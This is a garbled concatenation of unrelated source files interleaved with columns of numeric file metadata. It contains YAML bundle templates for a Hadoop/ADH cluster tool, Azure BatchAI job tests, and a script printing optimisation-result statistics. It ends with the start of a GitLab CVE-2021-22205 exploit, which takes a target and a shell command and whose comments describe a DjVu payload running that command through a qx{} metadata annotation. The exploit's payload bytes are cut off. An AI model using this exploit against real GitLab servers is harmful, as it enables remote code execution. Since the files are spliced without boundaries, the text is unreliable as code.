versions:
{2}: {1}
{3}: {0}
ADH:
versions:
min_strict: 0.1
max_strict: 4.0
- type: service
name: hadoop
version: 1.5
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
"""

# Import-side bundle with parameterized ADH (cluster) version constraints.
TEMPLATE_CLUSTER = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.4
import:
hadoop:
versions:
min_strict: 1.5
max_strict: 2.5
ADH:
versions:
{2}: {1}
{3}: {0}
- type: service
name: hadoop
version: 2.2
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
"""
def _generate_bundles(prefix, import_template, export_template):
    """Write one import/export bundle pair per VARIABLES entry under *prefix*.

    For each (min_val, max_val, max_key, min_key, export_version) tuple this
    creates ``{prefix}/{max_key}_{min_key}/import/config.yaml`` (the bundle
    declaring the version constraints) and ``.../export/config.yaml`` (the
    counterpart bundle declaring the version being imported).

    Raises ``FileExistsError`` if the directories already exist, matching the
    original ``os.makedirs`` behavior.
    """
    for variable in VARIABLES:
        d_name = f"{prefix}/{variable[2]}_{variable[3]}"
        export_dir = d_name + "/export"
        import_dir = d_name + "/import"
        for d in d_name, export_dir, import_dir:
            os.makedirs(d)
        with open(f"{d_name}/import/config.yaml", "w+", encoding='utf_8') as f:
            f.write(import_template.format(variable[0], variable[1], variable[2], variable[3]))
        with open(f"{d_name}/export/config.yaml", "w+", encoding='utf_8') as f:
            f.write(export_template.format(variable[4]))


# The two generation passes were previously duplicated inline; they differ only
# in the target directory prefix and the template pair used.
_generate_bundles("service_import", TEMPLATE_SERVICE, TEMPLATE_EXPORT_SERVICE)
_generate_bundles("cluster_import", TEMPLATE_CLUSTER, TEMPLATE_EXPORT_CLUSTER)
| 25.594828
| 92
| 0.610475
| 787
| 5,938
| 4.540025
| 0.138501
| 0.06717
| 0.029107
| 0.035824
| 0.936468
| 0.930031
| 0.9096
| 0.881892
| 0.881892
| 0.881892
| 0
| 0.025532
| 0.287639
| 5,938
| 231
| 93
| 25.705628
| 0.819149
| 0
| 0
| 0.822967
| 0
| 0
| 0.819468
| 0.032334
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0710e6b1764f62c6d5ea80b58293c14afbb04d14
| 16,144
|
py
|
Python
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 4
|
2016-06-17T23:25:29.000Z
|
2022-03-30T22:37:45.000Z
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 2
|
2016-09-30T21:40:24.000Z
|
2017-11-10T18:16:18.000Z
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 3
|
2016-05-03T20:49:46.000Z
|
2017-10-05T21:05:27.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
import re
from devtools_testutils import AzureMgmtTestCase, StorageAccountPreparer
from devtools_testutils import ResourceGroupPreparer
from msrestazure.azure_exceptions import CloudError
import azure.mgmt.batchai.models as models
from azure.mgmt.batchai import BatchAIManagementClient
from . import helpers
class JobTestCase(AzureMgmtTestCase):
def setUp(self):
    """Create the BatchAI management client shared by all tests in this class."""
    super(JobTestCase, self).setUp()
    self.client = self.create_mgmt_client(BatchAIManagementClient)  # type: BatchAIManagementClient
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_creation_and_deletion(self, resource_group, location, cluster):
    """Tests simple scenario for a job - submit, check results, delete."""
    # The job writes "hi" both to stdout and to its dedicated output directory.
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
                                    'echo hi | tee {0}/hi.txt'.format(helpers.JOB_OUTPUT_DIRECTORY_PATH_ENV),
                                    container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
        models.ExecutionState.succeeded)
    # Check standard job output
    helpers.assert_job_files_are(self, self.client, resource_group.name, job.name,
                                 helpers.STANDARD_OUTPUT_DIRECTORY_ID,
                                 {u'stdout.txt': u'hi\n', u'stderr.txt': u''})
    # Check job's output
    helpers.assert_job_files_are(self, self.client, resource_group.name, job.name,
                                 helpers.JOB_OUTPUT_DIRECTORY_ID,
                                 {u'hi.txt': u'hi\n'})
    # A deleted job must no longer be retrievable.
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_running_job_deletion(self, resource_group, location, cluster):
    """Tests deletion of a running job."""
    # 'sleep 600' keeps the job in the running state long enough to delete it mid-run.
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
                                    'sleep 600')
    self.assertEqual(
        helpers.wait_for_job_start_running(self.is_live, self.client, resource_group.name, job.name,
                                           helpers.MINUTE),
        models.ExecutionState.running)
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_running_job_termination(self, resource_group, location, cluster):
    """Tests termination of a running job."""
    # 'sleep 600' keeps the job running long enough to terminate it mid-run.
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'longrunning', 1,
                                    'sleep 600')
    self.assertEqual(
        helpers.wait_for_job_start_running(self.is_live, self.client, resource_group.name, job.name,
                                           helpers.MINUTE),
        models.ExecutionState.running)
    self.client.jobs.terminate(resource_group.name, job.name).result()
    # A terminated running job ends up in the failed state.
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
        models.ExecutionState.failed)
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=0, wait=False)
def test_queued_job_termination(self, resource_group, location, cluster):
    """Tests termination of a job in queued state."""
    # Create a job which will be in queued state because the cluster has no compute nodes.
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true')
    self.client.jobs.terminate(resource_group.name, job.name).result()
    # A terminated queued job ends up in the failed state.
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
        models.ExecutionState.failed)
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_completed_job_termination(self, resource_group, location, cluster):
    """Tests termination of completed job."""
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true')
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
        models.ExecutionState.succeeded)
    # termination of completed job is NOP and must not change the execution state.
    self.client.jobs.terminate(resource_group.name, job.name).result()
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
        models.ExecutionState.succeeded)
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_failed_job_reporting(self, resource_group, location, cluster):
    """Tests if job failure is reported correctly."""
    # 'false' exits with code 1, guaranteeing a failed execution.
    job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
                                    'false')
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
                                        helpers.MINUTE),
        models.ExecutionState.failed)
    # The failure must surface the exit code and a single 'JobFailed' error.
    job = self.client.jobs.get(resource_group.name, job.name)
    self.assertEqual(job.execution_info.exit_code, 1)
    self.assertEqual(len(job.execution_info.errors), 1)
    self.assertEqual(job.execution_info.errors[0].code, 'JobFailed')
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_preparation_host(self, resource_group, location, cluster):
    """Tests job preparation execution for a job running on a host."""
    # create a job with job preparation which populates input data in $AZ_BATCHAI_INPUT_INPUT/hi.txt
    job = helpers.create_custom_job(
        self.client, resource_group.name, location, cluster.id, 'job', 1,
        'cat $AZ_BATCHAI_INPUT_INPUT/hi.txt',
        'mkdir -p $AZ_BATCHAI_INPUT_INPUT && echo hello | tee $AZ_BATCHAI_INPUT_INPUT/hi.txt')
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
                                        helpers.MINUTE),
        models.ExecutionState.succeeded)
    # Both the main command and the preparation command contribute stdout/stderr files.
    helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
                                 {u'stdout.txt': u'hello\n',
                                  u'stderr.txt': u'',
                                  u'stdout-job_prep.txt': u'hello\n',
                                  u'stderr-job_prep.txt': u''})
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_preparation_container(self, resource_group, location, cluster):
    """Tests job preparation execution for a job running in a container."""
    # create a job with job preparation which populates input data in $AZ_BATCHAI_INPUT_INPUT/hi.txt
    job = helpers.create_custom_job(
        self.client, resource_group.name, location, cluster.id, 'job', 1,
        'cat $AZ_BATCHAI_INPUT_INPUT/hi.txt',
        'mkdir -p $AZ_BATCHAI_INPUT_INPUT && echo hello | tee $AZ_BATCHAI_INPUT_INPUT/hi.txt',
        container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
                                        helpers.MINUTE),
        models.ExecutionState.succeeded)
    # Both the main command and the preparation command contribute stdout/stderr files.
    helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
                                 {u'stdout.txt': u'hello\n',
                                  u'stderr.txt': u'',
                                  u'stdout-job_prep.txt': u'hello\n',
                                  u'stderr-job_prep.txt': u''})
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_host_preparation_failure_reporting(self, resource_group, location, cluster):
    """Tests if job preparation failure is reported correctly."""
    # create a job with failing job preparation ('false' as the preparation command)
    job = helpers.create_custom_job(
        self.client, resource_group.name, location, cluster.id, 'job', 1, 'true', 'false')
    self.assertEqual(
        helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
                                        helpers.MINUTE),
        models.ExecutionState.failed)
    # The failure must surface the exit code and a single 'JobNodePreparationFailed' error.
    job = self.client.jobs.get(resource_group.name, job.name)
    self.assertEqual(job.execution_info.exit_code, 1)
    self.assertEqual(len(job.execution_info.errors), 1)
    self.assertEqual(job.execution_info.errors[0].code, 'JobNodePreparationFailed')
    # Removed a leftover debug 'print(job.serialize())' -- the sibling container
    # variant of this test is otherwise identical and has no such print.
    self.client.jobs.delete(resource_group.name, job.name).result()
    self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_container_preparation_failure_reporting(self, resource_group, location, cluster):
"""Tests if job preparation failure is reported correctly."""
# create a job with failing job preparation
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true',
'false',
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.failed)
job = self.client.jobs.get(resource_group.name, job.name)
self.assertEqual(job.execution_info.exit_code, 1)
self.assertEqual(len(job.execution_info.errors), 1)
self.assertEqual(job.execution_info.errors[0].code, 'JobNodePreparationFailed')
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=2)
def test_password_less_ssh(self, resource_group, location, cluster):
"""Tests if password-less ssh is configured on hosts."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 2,
'ssh 10.0.0.4 echo done && ssh 10.0.0.5 echo done')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
job = self.client.jobs.get(resource_group.name, job.name)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'done\ndone\n',
u'stderr.txt': re.compile('Permanently added.*')})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=2)
def test_password_less_ssh_in_container(self, resource_group, location, cluster):
"""Tests if password-less ssh is configured in containers."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 2,
'ssh 10.0.0.5 echo done && ssh 10.0.0.5 echo done',
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
job = self.client.jobs.get(resource_group.name, job.name)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'done\ndone\n',
u'stderr.txt': re.compile('Permanently added.*')})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
| 61.854406
| 119
| 0.663404
| 1,838
| 16,144
| 5.651251
| 0.102285
| 0.092616
| 0.101473
| 0.096274
| 0.893617
| 0.892462
| 0.892462
| 0.881968
| 0.881968
| 0.872437
| 0
| 0.004151
| 0.224046
| 16,144
| 260
| 120
| 62.092308
| 0.825018
| 0.090374
| 0
| 0.80198
| 0
| 0.009901
| 0.061062
| 0.01465
| 0
| 0
| 0
| 0
| 0.19802
| 1
| 0.064356
| false
| 0.009901
| 0.034653
| 0
| 0.10396
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07280c2f21807e863415e49414e2bf8f0d3efcdd
| 8,485
|
py
|
Python
|
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | null | null | null |
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | null | null | null |
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | 1
|
2022-01-11T19:20:38.000Z
|
2022-01-11T19:20:38.000Z
|
"""
This script is used to print out information about the main results comparing the different dynamics.
It requires the dataframe of all results to run the script.
"""
import pandas as pd
df_results = pd.read_pickle("Dataframe_results_metrics_5.pkl")
# Did everything converged ?
a = len(df_results[df_results["status"] == 1])
print(f"{a} of the trials did not converge to an optimal solutions")
dyn = df_results["dynamics_type_label"].unique()
dyn = dyn[[0, 3, 2, 5, 1, 4]]
for d in dyn:
print(d)
a = len(df_results[(df_results["status"] == 1) & (df_results["dynamics_type_label"] == d)])
print(f"{a} of the trials with {d} did not converge to an optimal solutions")
# select only the one who converged
df_results = df_results[df_results["status"] == 0]
# only the one that were in the main cluster
df_sub = df_results[df_results["main_cluster"] == True]
# Clusters
print("The number of optimal cost in the main cluster were respectively")
for ii, d in enumerate(dyn):
df_sub_sub = df_sub[df_sub["dynamics_type_label"] == d]
print(f"{df_sub_sub.__len__()}")
print("for explicit{}, rootexplicit{}, implicit{}, rootimplicit{}, implicitqdddot{} " "and rootimplicitqdddot{}. ")
# Costs
print("The average cost were")
for ii, d in enumerate(dyn):
c_mean = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].mean(), 1)
c_std = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{c_mean} $\pm$ {c_std} min, ")
c_median = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max})")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(
"for \explicit{}, \rootexplicit{}, \implicit{}, \rootimplicit{}, \implicitqdddot{} "
"and \rootimplicitqdddot{} respectively (Fig.~\ref{fig:cost}). "
)
# Time and iterations
print(
"For Full-Exp, Base-Exp, Full-Imp-$\qddot$, and Base-Imp-$\qddot$, Full-Imp-$\qdddot$, and Base-Imp-$\qdddot$, respectively"
" the time (and iterations) required to converge"
" were in average "
)
for ii, d in enumerate(dyn):
t_mean = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].mean() / 60, 1)
t_std = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].std() / 60, 1)
iter = int(df_results["iterations"][df_results["dynamics_type_label"] == d].mean() / 60)
print(f"{t_mean} $\pm$ {t_std} min, ")
c_median = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].median() / 60, 2)
c_first_quartile = round(
df_results["computation_time"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0] / 60, 2
)
c_second_quartile = round(
df_results["computation_time"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0] / 60, 2
)
c_min = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].min() / 60, 2)
c_max = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].max() / 60, 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) min")
print(f"IC : {c_second_quartile - c_first_quartile}")
# iterations
print(
"For Full-Exp, Base-Exp, Full-Imp-$\qddot$, and Base-Imp-$\qddot$, Full-Imp-$\qdddot$, and Base-Imp-$\qdddot$, respectively"
" the iterations"
" were in average "
)
for ii, d in enumerate(dyn):
t_mean = round(df_results["iterations"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["iterations"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{int(t_mean)} $\pm$ {int(t_std)}, ")
# Torque residuals
print("While implicit transcriptions were not consistent,")
print("Translation torque residuals respectively reached")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["int_T"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["int_T"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{t_mean} $\pm$ {t_std} \si{{N.s}}, ")
c_median = round(df_results["int_T"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["int_T"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["int_T"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["int_T"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["int_T"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("Rotation torque residuals respectively reached")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["int_R"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["int_R"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{t_mean} $\pm$ {t_std} \si{{N.m.s}}, ")
c_median = round(df_results["int_R"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["int_R"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["int_R"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["int_R"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["int_R"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("It lead to RMSe in linear momentum of")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].mean(), 2)
t_std = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].std(), 2)
print(f"{t_mean} $\pm$ {t_std} \si{{kg.m^2.s}}, ")
c_median = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(
df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2
)
c_second_quartile = round(
df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2
)
c_min = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("And it lead to RMSe in angular momentum of")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].mean(), 2)
t_std = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].std(), 2)
print(f"{t_mean} $\pm$ {t_std} \si{{kg.m.s^{{-1}} }}, ")
c_median = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(
df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2
)
c_second_quartile = round(
df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2
)
c_min = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
| 58.116438
| 128
| 0.682145
| 1,336
| 8,485
| 4.028443
| 0.099551
| 0.170569
| 0.151617
| 0.183389
| 0.863991
| 0.847454
| 0.819584
| 0.79097
| 0.777778
| 0.740988
| 0
| 0.016791
| 0.129641
| 8,485
| 145
| 129
| 58.517241
| 0.711984
| 0.038774
| 0
| 0.282258
| 0
| 0.056452
| 0.435696
| 0.032428
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008065
| 0
| 0.008065
| 0.306452
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab12c5b54bd63c899fff44be60b86ef9c42461f7
| 3,325
|
py
|
Python
|
gitlab/CVE-2021-22205/poc.py
|
arniebilloo/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
gitlab/CVE-2021-22205/poc.py
|
starkxun/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 1
|
2022-03-14T06:07:39.000Z
|
2022-03-14T15:52:22.000Z
|
gitlab/CVE-2021-22205/poc.py
|
starkxun/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
# PoC setup for the GitLab unauthenticated-upload RCE (per the repo path,
# CVE-2021-22205). The payload below is a DjVu container ("AT&TFORM...DJVM"
# magic); presumably the image-metadata pass (ExifTool DjVu parser,
# CVE-2021-22204) evaluates the annotation that carries the command — TODO
# confirm against the advisory.
import sys
import re
import requests

# Usage: poc.py <target-base-url> <shell-command>  (no argv validation: missing
# arguments raise IndexError).
target = sys.argv[1]
command = sys.argv[2]
# One session so the sign-in cookie set by csrf_token() is reused by exploit().
session = requests.session()
# The sign-in page embeds the CSRF token needed by the upload endpoint.
CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')
# Raw DjVu bytes: `prepend + command + append` forms a complete file where the
# command sits inside a '(metadata (Copyright "\ " . qx{ ... } ...' annotation.
# Do not reformat these literals — every byte is structural.
